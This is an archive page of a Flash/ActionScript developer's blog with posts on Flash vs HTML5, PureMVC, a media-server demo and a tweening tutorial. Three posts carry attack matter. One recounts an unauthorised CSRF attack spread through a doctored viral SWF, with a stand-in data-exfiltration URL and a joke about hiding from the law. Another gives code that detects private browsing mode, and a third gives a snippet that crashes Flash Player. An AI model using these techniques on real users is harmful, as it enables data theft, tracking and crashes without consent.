Archive for the ‘Actionscript’ Category

« Older Entries

Flash vs HTML5 vs Adobe vs Apple

Wednesday, February 10th, 2010

Disclaimer: I’ve written this post a few days weeks ago when I was a bit pissed, so it has some ranting-ness in it. I do have a soft side for Flash, but, as I said before – technologies never cry, and I will use whatever is the best for the job.

The last buzz about “Flash is dead” really came out of proposition. All of these blind followers, blood-thirsty, warmongers that never seen an HTML tag or know what each these technologies can do, worshiping their new king HTML5, and are just shouting “we conquer video”, “kill kill”…

The fact that the colorful-kindle /slash/ enlarged-and-disabled-iPhone doesn’t have Flash, is important, but the reactions are completely exaggerated. I think Adobe should have stayed nonchalant about it which could might have lowered the flames. Anyhow, it’s easier to say in retrospect.

(Flash) Power to the people:

If you look at the short history. Flash enabled utterly amazing things on the web in times when static-ness and ugliness ruled. The problem is that it was too easy to create. All of a sudden un-capable people could have created “amazing” things. The fact that Flash could be abused so easily is part of what make some people hate it.

You can expect for HTML5 to be abused if it’ll be as accessible as Flash. That means, if tools like the Flash IDE and others will enable publishing to HTML5. Than again you can expect it to abuse either way.

RT @iainlobb “Flash developers of the world: unite and make terrible HTML5 banner ads that grind CPUs and crash, just to show that the grass isn’t greener”

The fact that things can be done differently doesn’t necessary mean it will. Most of what Flash can do, can be done long ago using Javascript and HTML (old buzzwords omitted). Actually Flash and Javascript developers can relatively easy switch, since the languages were almost the same on the older versions of Actionscript. Even the glitches were copied from JS. And anyway the main thing that matter is thinking interactively, like a Flasher do. With HTML5, the capabilities of the two technologies are even closer. But, the challenges of developing complex Javascript application are sill far greater, It’s still  the same old language, more error prone and more difficult to architect. I don’t see how an online game developer, for example, will want to develop her games using HTML5. In fact I’ve yet seen a decent, non experimental, online game written in Javascript.

To think that all of a sudden Flash will disappear, is nonsense.

RT @leebrimelow “You all better head immediately over to the FWA and check out your favorite Flash work. It may all be converted to HTML 5 by the morning.”

Even if we declare Flash as dead today, it’ll be a very lengthy process measured in years at best. And since, yet again, Flash isn’t dead yet. It has all this time to reinvent itself, Adobe should use this time wisely.

If you tell me you don’t use Flash, you’re basically telling me that you have never seen a video or played a game online?!
How about a nice colorful animation, or maybe neatly looking fonts done in sIFR, than you must install Flash and start experiencing the web.

Apple and the sealed garden:

There is something annoying about Apple arrogance, but, I have to say that what almost killed Apple in the past, is what making it so successful right now. More than 20 years ago when apple wanted to control everything on her PC (yeah right it’s called Mac) most users were savvy users who wanted full power. Usability, reliability and all of these great things Apple invented weren’t as important. Today is the grandpa era where consistent quality is a key.

Steve Jobs is so convincing that I almost believed him that he disallow Flash on the iPad to protect grandpa from a crashed browser – but I don’t. No one will deny that Flash has some issues, but it’s an integral part of the current web and wouldn’t be as such if it was just causing the browser to crash. Click-to-active could have been used to solve all of the real and unreal Flash issues.

Robert N. Lee “If somebody wants you to give up what you’ve got now in exchange for the promise of something way, way better later, you’re being screwed and not in a good way. This is pretty basic.”

Flash on the iPhone, for example, would enable full VOIP applications to run from the web-browser (i.e. ribbit). Google voice iPhone application , could have leverage it instead of just allowing cheap callbacks. Allowing this kind of freedom is unthinkable for Apple.

But Apple might be loosing it, again they want too much. Apple moved from making computers for a very small niche market of mainly tree huggers. To a very powerful and successful company reinventing the smart phone market completely. Again it might blow in her face, Google might come and bite you with her don’t be evil bullshit ;)

BTW, grandpa don’t want multitasking either, thumbs-up for that as well, Apple (no pun intended).

Adobe is evil too:

I still remember how many many years ago Adobe asked you to snitch on your friends that uses pirated software, and by doing so, to become Robin Hood. Yeah you heard it, this was their fight on pirated software. It’s OK to fight piracy but, how is that comply with the original story?! After reading the article about the old management I can see where it might came from.

RT @aral: “Remember that Adobe was on the edge of irrelevancy on the web and non-existent in mobile when they bought Macromedia.”

The question, “should we support Adobe and her proprietary Flash instead of the open standards?”, is somewhat misleading. Adobe is a big girl she should take care of her own. The question is – can they really make it? can they really reinvent Flash and the web yet again?

The idea that everything that is open is immediately good, is also misleading. There’re a lot of financial interests in openness. Many companies base their business model over open-source and openness. Preaching for open standards doesn’t immediately make you a saint.

Adobe might be an heavy/old corp, after our hard earn money. But, I can tell you, it does seems like they do have some nice, talented and community aware people when it comes to Flash. And compared to Apple, Adobe is like the Shangri-La of openness.

The last  bash against Flash might help to push Adobe to polish the player, if Adobe can afford putting even more resource on it. Either way it won’t be on the iStuff.

Yeah, but, HTML 5 is a standard and not a proprietary black box like Flash:

We all know users don’t care about the format, they just want the experience. Believe it or not, developers don’t care much either, they just want the power to get the best result, in our case power is IDE and runtime. The pain of delivering a truly cross-browser HTML is not something to be desired. Flash is still the best way to deliver rich interactive ubiquity.

And besides, HTML 5 may be a standard, but you’ll still be running it in a proprietary runtime, the browser.

The browser wasn’t chosen to be the ultimate way to deliver new and cool applications because of it’s wonderful capabilities. It became as such because it’s the lowest common denominator. Maybe it’s time for a better lowest common, Flash was a step in the right direction, maybe we’ll be better with something more powerful like Steam. Actually the browser was also “chosen” because it’s very easy to create content for it.

For the developers, I don’t think it really matter which technology to use. All these idiots developers who couldn’t handle Flash and are now gloating and think they will be able to easily create beautiful interactive content – all will be disappointed. (you know who you are, yeah I meant you personally ;) )

Thing are prone to change relatively quickly in our times. The only fact that I can squeeze out of this, is that Flash is still the prominent force of interactive-ness on the web and will remain as such in the foreseeable future for sure.

Posted in AJAX, Actionscript, Adobe Flash, Apple, Flash General, Google, HTML 5, Javascript, RIA, iPad, iPhone | 3 Comments »

Kiss And Tell What Is The User Browsing Mode

Monday, January 25th, 2010

To know if the user is currently in normal or private browsing mode can be valuable info for any ads providers and spammers, but not only.

With the upcoming Flash Player 10.1 (currently in beta 2) there are many welcome improvements. One of these is the support for private browsing as described in this article.

For me, one thing that  immediately jumped out from the aforementioned article was that, unintentionally, with the aid of the new Beta Flash Player, websites can tell which mode the user is currently using.

“…in private browsing with default settings, the default local storage limit in private browsing is 1 MB…”

“To protect user privacy, there is no way for developers to tell whether their content is handling normal or private LSOs. Flash Player handles local storage data in the same way.” No it doesn’t!

Not only I can tell about the current status of the Flash Player browsing mode, but now I can tell about the browser itself since Flash inherit its mode from the browser.

Load a small enough SWF (less than 215 x 138) so it won’t ever show the settings dialog.

Now, kiss (sorry for the cheesiness ;) ) the local storage with data greater than 128kb. If it reject the kiss then you’re in normal browsing mode, if it accept it you can tell it’s a private mode.

It’s that easy, load this blog post in Private Mode with Flash Player 10.1 beta 2 installed and you’ll see the difference:

The solution is simple, private and normal modes should behave completely the same. In this case the local storage capacity should be the same. Lower both to 128kb or up both to 1MB. Which one is better, you may ask?! I’ll tell you latter ;)

The good thing is that Flash Player 10.1 is still in beta 2 so I’m sure it’ll be fixed for by the final release.

The source code is below:

?View Code ACTIONSCRIPT
package {
	import flash.display.Sprite;
	import flash.display.StageAlign;
	import flash.display.StageScaleMode;
	import flash.events.NetStatusEvent;
	import flash.net.SharedObject;
	import flash.net.SharedObjectFlushStatus;
	import flash.text.TextField;
	import flash.text.TextFieldAutoSize;
	import flash.text.TextFormat;
	import flash.utils.getTimer;
	import flash.utils.setTimeout;
 
	/**
	 * This class will tell the current browsing mode of the user
	 * Tested with Flash Player 10.1 beta 2
	 * for more info go to:
	 * http://blog.guya.net
	 */
 
	[SWF(backgroundColor="#FFFFFF", width="400", height="35")]
	public class KissAndTell extends Sprite
	{
		private var _tf:TextField;
 
		public function KissAndTell()
		{
			initStage();
			createTF();
			setTimeout(saveData, 300);
		}
 
		private function initStage():void
		{
			stage.scaleMode = StageScaleMode.NO_SCALE;
			stage.align = StageAlign.TOP_LEFT;
		}
 
		//try to save 140kb into the local storage
		private function saveData():void
		{
			var kissSO:SharedObject = SharedObject.getLocal("kissAndTell");
			kissSO.data.value = getDataString(140);
 
			var status:String;
 
			try
			{
				status = kissSO.flush();
				kissSO.addEventListener(NetStatusEvent.NET_STATUS, netStatusHandler);
			}
			catch(ex:Error)
			{
				trace("Save failed");
			}
 
			//If we can save more than 128kb then we're in Private Mode
			if (status && status == SharedObjectFlushStatus.FLUSHED)
			{
				setPrivateText();
            }
		}
 
		//Listening to this event just to prevent exception on debug players
		private function netStatusHandler(event:NetStatusEvent):void
		{
			trace("event.info.code: " + event.info.code);
		}
 
		private function setPrivateText():void
		{
			_tf.text = "Private Browsing Mode";
			_tf.backgroundColor = 0xAA2222;
		}
 
		private function createTF():void
		{
			_tf = new TextField();
			_tf.autoSize = TextFieldAutoSize.LEFT;
			_tf.defaultTextFormat = new TextFormat("Arial, Verdana", 20, 0xFFFFFF, true, null, null, null, null, null, 10, 10);
			_tf.text = "Normal Browsing Mode"
			_tf.backgroundColor = 0x22AA22;
			_tf.background = true;
			addChild(_tf);
		}
 
		private function getDataString(kb:int):String
		{
			var t:int = getTimer();
			var word:String = "GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_";
			var count:int;
			var a:Array = new Array();
			var lenNeeded:int = kb * 1024;
			while(count * word.length < lenNeeded)
			{
				a.push(word);
				count++;
			}
 
			var ret:String = a.join("");
			trace("time for generating " + kb + "kb: " + String(getTimer() - t) + " ml");
			return ret;
		}
 
	}
}

Tags: , , , , ,
Posted in Actionscript, Adobe Flash, Flash General, Flash Security, Safeloper, Security | 4 Comments »

My PureMVC presentation

Tuesday, September 29th, 2009

When it comes to enterprise application it’s difficult to recommend  project owners to bet on a framework that hasn’t proved itself for a long time. So all these sexy new frameworks with their lovely IoC will have to excuse us for now. That leaves us with cairngorm (yeah, I’ve heard the rumors) and PureMVC which is better IMHO and many others HO.

Recently, I’ve made this presentation about PureMVC, targeted to a specific enterprise application. These are most of the slides from the presentation.

Generally, the topics are:

  • Why use an application framework?
  • Why choose PureMVC?
  • The PureMVC meta pattern
  • PureMVC cons
  • Can we SCRUM it?
PureMVC
View more presentations from guya1.

Posted in Actionscript, Adobe Flash, Adobe Flex, PureMVC, SCRUM | 12 Comments »

HTML 5 vs Flash vs SilverLight

Sunday, September 6th, 2009

This is by no mean a full technical comparison between these technologies, just a chat between 2 geeks. One is a skeptic backend dude ;) and the other one is yours truly, a GUI guy.

It started with an email from Eli (the backend dude)  titled “the Next big thing”?

Elihttp://www.chromeexperiments.com/ , RIP Flash. Long live HTML 5 + JavaScript.

Guy: This is old…  Let me know when Chrome will reach 99% of desktop computers.

Eli:  HTML 5 is old? LOL.  FYI, despite the fact that the spec is far from being finalized, browsers with sparks of HTML 5 support count among them ie8, ff3, opera and safari.

Guy:  Old news, that is.  HTML 5 is only started to get supported.   HTML 5 + Javascript has a small subset of what Flash 10 can offer.  By the time HTML 5 will be a standard Flash 12 will reach 90%

Eli:  Yeah, yeah, I’ve heard the same thing about java applets about a decade ago… ;)   Seems like the simplicity of markup languages makes them the long distance runners

Guy:  Exactly, Flash has succeeded where Java failed. Flash has a lot of issues, but currently (and in the few coming years for sure) it’s the most powerful and available runtime.  HTML + Javascript is far from simple and cause huge problems for complex applications.

Eli:  Flash is mostly used to fill gaps in HTML, not to solve the huge problems in the complex applications the web is made of, isn’t it?

Guy:  This is what Adobe aim to solve with Flash, to be the ultimate platform for creating and running RIA (Rich Internet Applications). Still, a lot of RIAs are written in AJAX (Javascript+HTML), which, with the aid of solid and powerful frameworks like jQuery become reasonable in some cases. Lately Google, which already have a lot of RIA tools, is trying to change the game with its Chrome browser and OS. The Chrome browser is equipped with a much faster JavaScript engine that enables what we can see in chromeexperiments.com. Microsoft is also trying to be a player in this space with its new SilverLight runtime.

Eli:  Yet, the idea of basing the web on some proprietary browser plug in is doubtable. Epic fall of java applets and endless annoying ActiveX bullshit are just a couple of examples. IMHO, the shortcoming of this approach is missing the idea that The Web is more than “screenfuls of text and graphics” ©. Layout engines, however, are here for more than a decade and markup languages – for ages, proving themselves in taking the web into the places no one was thinking then about.

P.S. The only thing Adobe aims is profit.

P.P.S. I love holy wars.

Guy:  The proprietary thing is indeed an issue, it prevents Flash from being accepted in some areas of the web and by some users. E.g. the Wikipedia video project uses HTML 5 video, they can’t use anything that is closed. What prevents Flash from being open-sourced is that it contain 3rd party patent not owned by Adobe. Adobe is already trying to appeal to the open source crowed with the opening of some of its IP http://opensource.adobe.com. IMHO they might completely open the Flash runtime if and when it’ll be pushed to the wall by Microsoft and its new SilveLight (talking about proprietary ;) .

Java and Active-X are completely different stories, each had its own reason to fail. Partially and shortly, it is too difficult to create a Java applet and its far from appealing to a designer. Active-x has no sandbox, hence it has a lot of security issues, and also runs only in IE.

HTML was created to display text and images with basic layout, Javascript was added to enable simple interactivity, no one dreamt it can be used the way it’s done today. Only with the maturity of the browsers and with specialization of web developers, these king of RIAs could have been created. Yet it still pushes the tech to it limits.

The HTML 5 standard will be adopted relatively fast, but we’re still talking in years. Even with the Chrome JS engine (V8), Javascript can’t match the power of languages like Actionscript 3.0 and C#. Javascript 2 is somewhere in the very distant future. HTML 5 biggest improvement is the support for media (video/audio). But, it still can’t compete with Flash and SilverLight media abilities, in terms of playback and deployment.

HTML 5 is nice but the main holy war is between the reigning RIA world champion which is Adobe Flash and the challenger which is Microsoft SilverLight. There is much to be loved about this holy war, since it pushes the technologies forward and the biggest winners are us, the developers and the users.

(I’m talking about hard-core RIA, not some lightbox image gallery which is still preferably done in HTML)

P.S.  Adobe isn’t a saint, but, everyone want to make some profit, even google, even us as I recall ;) If you gain it morally and also use it to make something like the web better, than it’s fine with me. 

P.S.S aforementioned.

Posted in AJAX, Actionscript, C#, Flash General, Flex 3, Google Chrome, Javascript, RIA, Silverlight | 6 Comments »

The biggest terrorists in the world are… Flex bloggers

Tuesday, July 14th, 2009

Adrian Parr, a Flex blogger mostly known for his post listing of AS3 frameworks got hacked by some political lamers. The whole blog is replaced with common and lame hacker page. The allegedly hackers came from this Arab security forum, m4r0c-s3curity.cc.

What is the relation of this blog to your “war on terror”?! Leave your political BS where it belongs.

Posted in Actionscript, Flash General, Flex 3, Security, Wordpress | 8 Comments »

Encapsulating CSRF attacks inside massively distributed Flash movies – Real world example

Sunday, September 14th, 2008

Update: Added a sterilized demo and the source code.

CSRF (Cross Site Request Forgery) is considered one of the most widely spread exploits in websites today. I’ve written before about how a legitimate Flash file (swf) can be extremely viral. Few days ago I did a real attack, exploiting a CSRF flaw and elaborated it using the nature of Flash virality. The result shocked me.

I have a confession, I sometime look at the source of websites I browse, generally just to see how they did this and that. I also sometimes encounter security flaws in the script I examine, these flaws range from the very dangerous to the not so important, and my reactions range from informing the owners to just ignore it. I had the honor to find a very lame CSRF flaw in a big website which I’m familiar with it’s owners and some of its users. It was a great opportunity to do a real world test on this exploit. In the exploit I found, the attacker can obtain a lot of personal information from the user. A famous CSRF of similar nature has happened to gmail. Bear in mind that this kind of test is illegal and you should always be sure you won’t get in trouble, or just hide very well ;)

I took the same old viral movie of the pug cleaning the screen (screenclean.swf) and manipulated it (added some simple script) in a way that will attempt to attack any user that’ll view it, if the attack is successful and the user data is stolen it’ll be posted to my database (I’ll review the technical details at a latter point). I’ve then, uploaded the file to a server and sent the link to a few users that I know that uses that website, making it look like a naive chain letter.

pug_csrf

Then, I’ve waited for the stolen data to appear in my  database. It was exiting when the first hacked users started to emerge, and with every few refreshes there was a new one. It got a little scary when I saw users that I haven’t directly sent them the email. It was a proof of the virality of the attack.

csrf_db_table_01t

I was shocked when I saw that some of the users were added to my database being attacked from other servers then mine. This has proved the main point of the test, that attacks inside Flash (swf) files aren’t only viral but also get distributed. I wanted to show that this can happen pointing the screenclean.swf which can be found on ~600 different locations. I’ve never imagined that’ll it’ll happen so fast with my test, and on such an old movie.

After a few hours I’ve pulled the plug on this test and changed the swf file to the harmless original. But it was already too late the swf file got re-distributed (copied to other servers). Since I didn’t set the attack to expire and hasn’t obfuscate the code inside it, It was still attacking users, and worse, someone can look inside the swf and manipulate the attack to his needs. I had no control over that anymore, so we needed to fix this CSRF flaw ASAP.

Using Flash as a vessel to distribute CSRF attacks has some distinct benefits for the attacker:

- Beside the virality nature of these kind of Flash videos and games, swf files gets redistributed (hosted from other servers). This kind of attack will work no matter which server the file is served from, directly or embedded inside an html page.

- Script is hidden inside the Flash (swf), won’t be seen even with “View Generated Source”. Can be obfuscated inside the swf as well. Unless you’re watching the traffic you’ll see nothing suspicious.

- Multiple attacks in one swf. If it’s a game played for an hour, there is plenty of time to try many different attacks. The swf can download new kinds of attacks and/or instructions, when these are available, from the attacker server.

- Attack can be manipulated according to the date and time. For ex, let the swf distribute for a few days before starting to attack, set the attack to expire to make it more stealthy.

- Use shared object (Flash cookie) to maintain the user hacked status, more consistent then a cookie.

- Stealing large amount of data is easier as the data can be taken back to the swf and cross-domain Post can be used instead of Get.

Technical info

First of all, what enable this attack is the flaws and features inside every browser and the Flash Player, as I describe here.

Most CSRF attacks manipulate the user data on his behalf, as described here. The flaw I’ve found is returning live Javascript object with lots of personal data, similar to what happened to gmail. It was done this way, I guess, for ease of development, every page that is authenticated can load the url http://victim.com/personal.php?random and get the user’s data ready for any javascript code on the page, for ex, personalData.email.

The way that browsers are built, when the user is authenticated on one domain with a session or a cookie, every page that’ll load a url from this domain inside a script tag will use the authentication, even if the main page is on different domain. A script tag is one of these rare elements that are exempt from the browsers cross-domain-policy and can be loaded for use on different domains.

When the Flash movie (swf) is viewed inside a browser, the swf is “injecting” a javascript code to the page. This javascript is manipulating the page’s DOM and dynamically creating a script tag, this script is loading the vulnerable url as it source. Most of CSRF attacks will be done at this point, but, since our url is returning data, we need to wait for it and then steal it. We use an interval to check when the data is ready on the page, parse it as a string only with the important data then save it to our server database using the dynamically c
reated script with a get parameter http://attacker.com/stolenData.php?data=sensetive_data. We could have considered putting the data back into the swf and then post it to our server, Flash can do a cross-domain post as opposed to Javascript, might be more efficient when dealing with a large amount of data.

If the attack is successful we save it as a cookie, so we won’t attack the same user more then once. Again, we might consider using a Flash shared object which have more consistency.

Fixing the flaw in the website was just a matter of changing the returned data to a raw JSON instead of a live Javacript object. Fixing all CSRF flaws in a website generally is slightly more cumbersome, but not that much.

Added a sterilized demo and the source code.

Summery

Generally users feel comfortable following links, thinking it’s safe since they’re not installing anything, all the more so when it comes to links for flash and images.

This kind of attack is easy to reproduce, an attacker can simply go to youtube, download the FLV of the coolest short video and repeat the process, or worse, put it inside of an addictive game.

There is a tendency to accuse the platforms for being insecure. I agree that the browsers and the Flash Player will have to disallow scripting between them by default when loading a swf file directly, IE already tries to do it but fails miserably. That won’t solve any scenario though, since the harmful swf can be naively embedded inside an html page with scripting set to be allowed.

It’s always up to the developer to develop secure websites and applications without any CSRF or other type of flaws. No matter how strict is the platform (in this case the browsers and the Flash player), a “good” developer will be able to break the toughest security model in a second by writing vulnerable script.

It up to the developer to be a Safeloper and to produce secure applications ;)

The users should be able to feel safe following a link they get in an email message, it’s part of the nature of the Internet, following links that is.

I also did a similar attack using a JPG but that’s a different story.

Posted in Actionscript, Flash General, Flash Security, Google Chrome, Javascript, Safeloper, Security | 10 Comments »

Pay Per View with Flash Media Server

Wednesday, August 15th, 2007

At JAJAH we are always looking for ways to leverage our payment system in new and exciting ways. One of the ideas that came up was to sell calls to videos. You call to a certain number and while the call is active, you can watch a certain video. Not a new concept at all, it’s been used in some industries for ages now ;) . But, we only needed a demo for now and we needed a super quick way to create it. The obvious choice was to use Flash Media Server with some kind of ticketing system. For this demo we used a third party shared server from influxis which is more then enough in this case.

Creating a ticketing system with FMS couldn’t be easier, you can find some tutorials about it here, here and here. But let me summarize it for you. Create some kind of a temporary ticket (random number or GUID will do) and send it to the client (the Flash player), when the player request the video stream from the server, send this ticket to the FMS along with the request. The FMS in it’s turn validate this ticket against your server. Continue checking this ticket in a certain interval and as long as this ticket is valid, play the stream, if it become invalid kill the connection. Thats it. Most of the articles on the web about FMS tells you that Flash-Remoting is needed for any kind of communication from the FMS. It isn’t completely true. While using remoting may be beneficial in some cases, since FMS 2.0 it is easy to make asynchronous calls like webservices and loadvars. So you have more choise when developing your ticketing system. If you want to use Flash Remoting in dot.net consider using Midnightcoders WebOrb, as an alternative to Macromedia’s Flash Remoting MX (both didn’t install on Vista at the time, btw).
Since Jajah’s pay per view is only a demo, we didn’t exert ourselves to make it supper secure. you can learn more about securing your videos in this Adobe Flash Media Server article.

Jajah Pay Per View

To watch the pay per view demo, go to jajah.com, login or register and make a (free) call to this number +43-123456789. Your phone will ring, answer the call and behold. You will see a cool animation, an homage to IceAge. When you’ll hang up your phone, the animation will stop. If you’ll try to watch the movie after hanging-up, the stream won’t be served from the FMS since the ticket isn’t valid anymore.

Posted in Actionscript, Animation, Flash General, JAJAH, VOIP 2.0 | 2 Comments »

Hostlynx 2.0 – Serious Flex app

Friday, July 13th, 2007

There is a claim that there isn’t enough serious Flex applications out there. I’ve recently had the honor to preview an impressive one, and also to conduct a short interview with Dima Gutzeit the Project Manager of this app, named Mailvision Hostlynx 2.0.
This is another one for you to showoff when arguing for the right technology for your next application, currently there are only some information and screenshots, but, I’ll let you know when a full demo is publicly available.

Hostlynx 2.0 - Screenshot2 small

Hostlynx 2.0 - Screenshot1 small

Q: What is Hostlynx 2.0?

A: Hostlynx 2 is the next generation of MailVision Class 5 SoftSwitch for VOIP telephony (SIP protocol). The product allows a system provider to setup a telephony network and offer advanced telephony services to its subscribers (IPCentrex). System management of the solution is based on Flex+Webservices.

Q: Who is the audience of this application?

A: Service providers and corporates who wishes to enter the fast evolving VOIP market.

Q: Why do you think Flash is the right technology for this project?

A: During the research for the project we have considered several technologies, including various AJAX toolkits, JSF and etc. The following convinced us to go with Flash/Flex: Flash player is installed on 98% of desktop computers so in majority of cases it will not require any client side installations. We wanted to deliver the best user experience we could and flash allowed us to do that.

Q: Generally, how is this app structured, client, backend, architecture etc’?

A: Our application uses webservices to communicate between client and server, where Flex application is used as a webservices client and JAXWS on the server side. When we started working with Flex (2.0) its webservices implementation was very weak and basic, so we had to create many workarounds on the server side to compensate. Flex 2.0.1 Hotfix 2 changed that, since we were part of the beta program for Hotfix2 and Adobe staff were kind enough to listen to our requests and enhance the webservices implementation.

Q: Have you used Cairngorm?

A: Yes, we do. Our application uses MVC, and this is done by using Cairngorm (2.0). ServiceLocator is responsible for all the webservices related stuff – sending requests and etc.

Q: How many people worked on the project?

A: Project development involved 2-3 developers and one designer. Project duration was around one year.

Q: Did any of the developers had previous experience with Flash or Flex?

A: That was one the “negative” factors when we decided on technology, since none of our developers had any previous experience not with Flash nor ActionScript. The learning curve was not a short one, since all the developers were from Java/JSP world.

Q: Will there be an online demo of the app?

A: We are on Beta 2 release, and a full featured demo will be available as soon as the application is stable enough.

Q: Do you have plans for creating similar apps?

A: I believe that the majority of future web/desktop projects of Mailvision will use Flex/AIR.

Q: What do you think is the future of the Flash platform and RIA in general?

A: Flex rocks :-) .

Posted in AJAX, Actionscript, Flash General, Flex 2.0, Miscellaneous, VOIP 2.0, Web 2.0 | 1 Comment »

Too much focus will kill you

Sunday, July 8th, 2007

I’ve just came across of a way to kill the Flash player with a few lines of AS 2.0. I know of at least one other way of killing the Flash player along with it’s host, may it be the browser or the Flash IDE, but this was with the old 7th player, this time we’re talking about the latest 9th version. It’s a little awkward, and don’t ask me how I got it, but, it involves a MovieClip, a TextField, Selection, Macromedia’s Delegate, a filter, and a trace, yeah, it won’t work without a call to trace. I think the main trouble maker is the Selection.onSetFocus, but, I couldn’t recreate it without any of the above ingredients, and I have a feeling that AS2’s trace is also problematic in Flash Player 9. (You should anyway “Omit trace actions”, from the settings, when publishing swfs)

Focus Kills

I haven’t tried it, but, I doubt that it can be recreated with AS3 on the VM2, it’s the VM1 that we have to carry along for backward compatibility that causes all this trouble. I tested it on some different machines with different Flash players and so far it crushed them all, here is the list:

Ver: WIN 8,0,22,0 | Debug: true | OS: Windows XP
Ver: WIN 9,0,16,0 | Debug: true | OS: Windows XP
Ver: WIN 9,0,28,0 | Debug: false | OS: Windows XP
Ver: WIN 9,0,45,0 | Debug: false | OS: Windows XP
Ver: WIN 9,0,45,0 | Debug: false | OS: Windows (Server 2003)
Ver: WIN 9,0,45,0 | Debug: true | OS: Windows Vista
Ver: WIN 9,0,45,0 | Debug: false | OS: Windows Vista
Ver: WIN 9,0,47,0 | Debug: false | OS: Windows Vista
Ver: MAC 9,0,28,0 | Debug: false | OS: Mac OS 10.4.9

Copy this code into an empty FLA first frame, or download the source below to see how it goes.

?View Code ACTIONSCRIPT
var mc:MovieClip = this.createEmptyMovieClip("mc", 0);
 
var tf:TextField = this.createTextField("tf", 1, 20, 20, 300, 100);
tf.type = "input";
tf.border = true;
tf.text = "Flash Player Varsion: " + System.capabilities.version + "\nDebug Player: " + System.capabilities.isDebugger + "\nOperating System: " + System.capabilities.os + "\n\nClick here or press the TAB key to kill Flash";
 
tf.onSetFocus = mx.utils.Delegate.create(this, glow);
 
Selection.addListener(this);
 
function onSetFocus(oldf:Object, newf:Object):Void{
Selection.setFocus(oldf);
}
 
function glow(){
mc.filters = [new flash.filters.BevelFilter()]; // any filter except BitmapFilter()
trace(mc.filters);
}

Download source files.

Try it (Warnning!!!, it may crash your browser)

Posted in Actionscript, Flash CS3, Flash General, Flash Security, Security | 2 Comments »

Shape Hints – Have you forgotten how good they taste ?

Saturday, April 14th, 2007

These days it’s easy to forget that Flash is an amazing classic animation tool. Ever since the arrival of the fine Macromedia Tween Class and the amazing Fuse Kit (a new version was just released) and great books like Foundation Actionscript Animation, by: keith peters, new version for Actionscript 3.0 is on the way (not affiliat), it seems that we want to script our animation no matter what! Now, don’t get me wrong, I also think that scripted animation is very powerful and I use it all the time. But, I sometimes find myself over using it in places where I should have used a simple tweening instead.With the 8th version of Flash we received a nice improvement to the tweening capabilities, it is now possible to achieve a relatively complex tweening animation with only two key frames. Check out this tutorial: Achieving Amazing Easing Effects in Flash, by: Rafiq R. Elmansy.

And what about the new kid animation abilities?! With what I’ve seen so far in the main WPF interactive editor CTP (beta) vesions, it fall short of Flash, it has an interesting concept of having the animation of an object as just another property of that object. But, it lake of satisfactorily key-frames controll and things like shape tween are not existent. These things might be improved in the final version, but it seems to me that Microsoft is still donesn’t pay atantion to creativity as it should have, and is mainly thinking about GUI creation.

I just hope that Adobe wont forget the origins of Flash and one of the main reasons it is such a terrific tool, and is planing a tons more of animation and creativity features in the next Flash IDE release.

Note: I’ve written this post some time back, before the announcement of the new Flash CS 3 (Flash 9) feature list. It seems that we’ll get some animation improvements, the two most interesting improvements looks like, Custom easing control and Copy and paste animations. The first will “provides independent control of position, rotation, scale, color, and filters”, it will give us much finer control over every keyframe in our animation similar to high-end animation software. The second will let us copy timeline animations as fully editable Actionscript 3.0 XML objects for easy duplication and modification. It looks like even complex tweening that uses a motion guide can be copied and edited, no clarity about the coping of a shape tweens though. I guess no one at adobe have the nerve to dive into the Flash core and update something as the Shape Hints or even the Timeline itself, but overall, it seems like a nice update in terms of the animation abilities of Flash.

Flash CS3 will be released in April 20th.

Behind The Curtains – Shape Hints Animation Tutorial

Hover above this box:

I was amazed when I first saw shape animation in flash, create two different shapes on two different frames and easily get a morphing animation between them…

Few years back I was asked to make a flash banner for Habima Theater. I came with the, somewhat cheesy, idea of a animating a red curtain, and inside it, to fade images from few of the theater best shows.

Creating a curtain animation in Flash shouldn’t be a problem, I thought, I’ll create the start and finish frames and my beloved Flash will do the rest. The start frame of a simple curtain animation is simply a box and the end frame is an open curtain…

1. Create a new Flash Document, resize it to 320 x 240 and set the Frame rate to 30.

Document Properties

2. Create a red rectangle (R) anywhere on the stage no matter what size, select the rectangle and set it’s properties (Show/Hide Properties Ctrl+F3): width and height to 160 and 240 respectively, x and y both to 0.

3. With the rectangle still selected press F8 to turn it into a Movie clip, and name it curtain.

Convert to Movie clip

4. Inside the properties panel name the instance of the curtain on stage to leftCurtain.

properties

5. Double click on leftCurtain to step inside it. On the Timeline (Show/Hide the Timeline Ctrl+Alt+T) name Layer 1 to curtain. Right click on the 30th frame and select Insert Keyframe (F6).

Insert Keyframe

6. The first frame of our animation, the closed state of our curtain is already done on frame 1, we’ll now create the opened frame on frame 30. Deselect the red rectangle by clicking anywhere outside it on the stage. Point your mouse to the bottom right corner of the rectangle until the mouse cursor turns into a right angle shape, this indicates that you can grab the corner. With the Shift Key pressed click and drag the rect corner to the left and to about 45px from the left edge.

Drag Corner

7. In order to achieve an open curtain look we’ll split it near the bottom. Point the cursor near the edge of the now diagonal line to about 50px from the bottom. When the cursor changes its shape to a small round line, press Ctrl and click to drag the new point to left to about 30px from the edge. Pressing on the Ctrl key while dragging a line breaks it and creates a new point where the break is.

Drag Middle

8. Similar to the previous step, hover with the mouse near the right edge of the rectangle, when the cursor change it’s shape click and drag (without pressing Ctrl) the edge until it gets a nice belly, do the same for the small right edge.

Drag Belly

9. We done the entire 2 frames of our animation, now it’s time to animate it. In the Timeline Select frame 1 and in the properties panel set Tween to Shape, also set Ease to 70, it will make the animation nicer by easing it near the end.

Tween

10. It looks like we got ourselves an opening curtain animation, but testing the movie (Ctrl+Enter) reveals that though we got an animation it’s nothing like a believable curtain. This is because Flash can’t know what exactly we’re animating and how we like the morphing to be done. Flash simply guess, and this time its guess is very wrong. This is where Shape Hints come to our aid.

11. Select frame 1 and click on Modify -> Shape -> Add Shape Hint (Ctrl+Shift+H) 5 times. This will create 5 Shape Hints identified by characters from a to e. Arrange the Hints in the 4 corners and 1 where the break is, look at the image. Go to frame 30 and arrange the Hints respectively to the 1th frame. Every Hint character in frame 1 must correspond to the Hint character in frame 30.

Shape Hints

Tip: you can lock the layer and still be able to edit the Shape Hints.

Tip: Show/Hide all the Shape Hints Ctrl+Alt+H

12. Now lets test our movie (Ctrl+Enter) to see our curtain animate to its open state as it should.

